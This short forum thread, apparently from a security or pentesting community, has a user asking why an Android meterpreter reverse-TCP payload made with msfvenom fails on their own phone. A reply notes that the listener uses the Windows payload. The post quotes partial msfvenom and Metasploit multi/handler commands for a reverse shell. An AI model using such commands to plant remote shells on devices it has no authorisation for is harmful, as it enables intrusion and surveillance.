Saif Posted March 10, 2022 Share Posted March 10, 2022 Hey guys I have a problem that is bothering me for a long time now.I can't execute a meterpreter shell that I created in Kali Linux I click it and nothing happens.The code I used at the start was (msfvenom -p Android/meterpreter/reverse_tcp LHOST=my ip LPORT=445..etc and when I launched it on my android phone nothing happened it didn't open or anything and it didn't connect to my PC(Kali Linux).Another code that I have used is but that code doesn't work too.For both of the payloads I've used : use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST... set LPORT... exploit If you guys know what the problems is please reply because I don't seem to find it.Thank you in advance. Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 10, 2022 Share Posted March 10, 2022 Why are you listening with the Windows payload? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.